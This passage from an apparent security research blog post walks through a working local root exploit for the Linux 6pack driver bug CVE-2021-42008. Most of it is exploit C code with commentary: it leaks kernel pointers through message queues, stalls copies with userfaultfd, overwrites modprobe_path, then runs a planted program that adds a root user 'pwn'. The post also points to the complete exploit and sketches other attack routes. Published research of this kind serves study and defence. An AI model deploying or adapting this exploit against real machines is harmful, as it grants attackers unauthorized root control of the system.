        leak = (uint64_t *)recv_msg(qid_A[id], 0x1100, 0);

        if (leak == NULL)
            continue;

        for (int i = 0; i < 0x220; i++)
        {
            if ((leak[i] & 0xffff) == INIT_IPC_NS) // [2]
            {
                init_ipc_ns = leak[i];
                valid_qid = find_message_queue((uint16_t)leak[1]); // [3]
                modprobe_path = init_ipc_ns - 0x131040; // [4]
                return;
            }
        }
    }
}

[...]

leak_pointer(); // [1]

[...]

Since we don’t now to which queue belongs the message allocated right after the sixpack structure, we use leak_pointer() to iterate through all the queues, until we find a init_ipc_ns pointer [2]. If we find the pointer, it means that we found the correct queue, so we obtain its QID comparing the message content thanks to the find_message_queue() function [3], and we finally compute the address of modprobe_path. If the procedure fails, it means that none of our messages has been allocated after the sixpack structure. In this case we can simply launch the exploit again (since we are writing in kmalloc-4096 which is usually not heavily used by the kernel, the probability of a crash is relatively low). Here is a visual representation of what happens when we trigger the Out-Of-Bounds Read:

Now that we know the address of our target, modprobe_path, we need to get an arbitrary write primitive. We could proceed initializing a new sixpack structure, but this would decrease the success rate of our exploit. The question is: is there a way to reuse the sixpack structure we just corrupted? The answer is yes! Remember when we analyzed the tnc_init() function? Well, when a new sixpack channel is initialized, tnc_init() sets a 5 seconds timer. Once the timer expires, resync_tnc() is called:

static void resync_tnc(struct timer_list *t)
{
	struct sixpack *sp = from_timer(sp, t, resync_t);
	static char resync_cmd = 0xe8;

	/* clear any data that might have been received */

	sp->rx_count = 0; // [1]
	sp->rx_count_cooked = 0; // [2]

	/* reset state machine */

	sp->status = 1; // [3]

        [...]

	/* Start resync timer again -- the TNC might be still absent */
	mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [4]
}

As we can see from the resync_tnc() source code, after 5 seconds, the receiver state is reset, meaning that sp->rx_count and sp->rx_count_cooked are set to 0 [1] [2] and sp->status to 1 [3], then the 5 seconds timer is started again [4]. This is exactly what we need, because if we wait for 5 seconds from when we initialized the sixpack structure for the first time, we can reuse it and cause a second Out-Of-Bounds Write!

We can proceed initializing N_THREADS page fault handler threads (in our case N_THREADS is equal to 8😞

void create_pfh_thread(int id, int ufd, void *page)
{
    struct pfh_args *args = (struct pfh_args *)malloc(sizeof(struct pfh_args));

    args->id = id;
    args->ufd = ufd;
    args->page = page;

    pthread_create(&tid[id], NULL, page_fault_handler, (void *)args);
}

[...]

for (int i = 0; i < N_THREADS; i++) // [1]
{
    mmap(pages[i], PAGE_SIZE*3, PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    ufd[i] = initialize_ufd(pages[i]);
}


for (int i = 0; i < N_THREADS; i++)
    create_pfh_thread(i, ufd[i], pages[i]); // [2]

[...]

Frist call mmap() for 8 times, and each time we map 3 pages of memory. Then for each iteration we start monitoring the second page using userfaultfd [1]. Then we start 8 page fault handlers [2]. Each one of these threads will handle a page fault for a specific page.

We can proceed allocating 8 messages in kmalloc-4096 and the respective segments in kmalloc-32:

void alloc_msg_queue_B(int id)
{
    if ((qid_B[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void *allocate_msg(void *arg)
{
    int id = ((struct t_args *)arg)->id;
    void *page = ((struct t_args *)arg)->page;

    debug_printf("[Thread %d] Message buffer allocated at 0x%lx\n", id + 1, page + PAGE_SIZE - 0x10);
    alloc_msg_queue_B(id);

    memset(page, 0, PAGE_SIZE);
    ((uint64_t *)(page))[0xff0 / 8] = 1; // msg_msg.m_type = 1

    if (msgsnd(qid_B[id], page + PAGE_SIZE - 0x10, 0x1018, 0) < 0) // [4]
    {
        perror("[X] msgsnd");
        exit(1);
    }

    debug_printf("[Thread %d] Message sent!\n", id + 1);
}


void create_message_thread(int id, void *page)
{
    struct t_args *args = (struct t_args *)malloc(sizeof(struct t_args));

    args->id = id;
    args->page = page;

    pthread_create(&tid[id + 2], NULL, allocate_msg, (void *)args);
}

[...]

close_queue(qid_A[valid_qid]); // [1]
payload = generate_payload(modprobe_path - 0x8); // [2]

for (int i = 0; i < N_THREADS; i++)
    create_message_thread(i, pages[i]); // [3]

waitfor(6, "Waiting for resync_tnc callback..."); // [5]

[...]

First of all we close the queue to which belongs the message allocated right after the sixpack structure [1]. This will free the message and its respective segment, creating a hole in the heap, allowing us to allocate another message in the same location (because of freelist LIFO behavior). We re-generate our malicious payload, this time using modprobe_path - 0x8 as target [2]. This will set the msg_msg.next pointer to modprobe_path - 0x8. We are subtracting 8 bytes from modprobe_path because the first QWORD of a segment must be NULL, otherwise load_msg() will try to access the next segment causing a crash. Afterwards, we create 8 threads using create_message_thread() [3]. Each one of these threads will allocate a new message in kmalloc-4096. For each thread, we place the message buffer, right 0x10 bytes before the monitored page [4], this way the copy_from_user() call in load_msg() will cause a page fault, and we will be able suspend the copy operation from user space. Finally we sleep for 6 seconds [5], this way the function resync_tnc() will be called by the kernel resetting the sixpack receiver state. All this will cause the following situation in memory:

As we can see, one of the messages has been allocated right after the sixpack structure. The allocation of the message and the successive load_msg() call, caused a page fault, and we successfully suspended the copy operation. It is important to note that even in this case we don’t know to which queue belongs the message allocated after the sixpack structure, so I identified the queue with QID #Y.

We are ready to send our malicious payload over the sixpack channel:

[...]

puts("[*] Overwriting modprobe_path...");
write(ptmx, payload, WRITE_PAYLOAD_SIZE); // [1]

[...]

Once we send the malicious payload [1], it will misalign the writing frame as we have seen in the previous paragraphs, setting sp->rx_count_cooked to 0x190, then it will set it to 0x696 tricking decode_data() into continuing to write into the next object in memory: MSG #0 in QID #Y. Finally it will overwrite multiple fields in the msg_msg structure, including the next pointer. Now msg_msg.next, instead of pointing to the segment, points to modprobe_path - 0x8:

We can finally release every page fault:

[...]

release_pfh = true;

[...]

Once we release every page fault, the modprobe_path string (set by default to “/sbin/modprobe”) will be overwritten with the path of our malicious program “/tmp/x”:

In the final stage, we trigger the call to /sbin/modprobe, now replaced with /tmp/x, and we verify if the new user with root privileges has been added:

[...]

system("/tmp/asd 2>/dev/null"); // [1]

if (!getpwnam("pwn")) // [2]
{
    puts("[X] Exploit failed, try again...");
    goto end;
}

puts("[+] We are root!");
system("rm /tmp/asd && rm /tmp/x");
system("su pwn");

[...]

First we execute a program with an unknown program header [1] forcing the kernel to call __request_module() → call_modprobe() → call_usermodehelper_exec() and execute our malicious program, then we check if the user pwn [2] has been added using getpwnam(). If the user exists, we can use su pwn to become root, otherwise we simply need to launch the exploit again.

Here is the exploit in action:

You can find the complete exploit here:

CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

The exploit is designed and tested for Debian 11 - Kernel 5.10.0-8-amd64. If you want to port the exploit to other kernel versions, remember that the distance between sp->cooked_buf and the next object in memory may change.

Conclusion

In this article I showed how the techniques presented by FizzBuzz101 and me with Fire of Salvation and Wall Of Perdition can be used to exploit real vulnerabilities in the Linux Kernel. There are many other valid approaches to exploit this vulnerability. For example, after Kernel 5.11, a first patch made userfaultfd completely inaccessible for unprivileged users, then a second patch restricted its usage in a way that only page faults from user-mode can be handled, so in the second stage, an attacker may simply use FUSE to delay page faults creating unprivileged user+mount namespaces, or may abuse discontiguous file mapping and scheduler behavior instead of using userfaultfd. Another approach for the second stage may be to set msg_msg.next to the address of a previously leaked structure, for example seq_operations, subprocess_info, tty_struct and so on (check References for a list of exploitable kernel structures), and then free the message and its respective segment (now pointing to the target structure) using msgrcv() without the MSG_COPY flag. This will result in a powerful arbitrary free primitive. From here is possible to cause a Use-After-Free to the target structure and hijack the Kernel control flow overwriting a function pointer. Another very interesting approach is the one used to exploit CVE-2021-22555. As always, for any question or clarification, feel free to contact me (check About).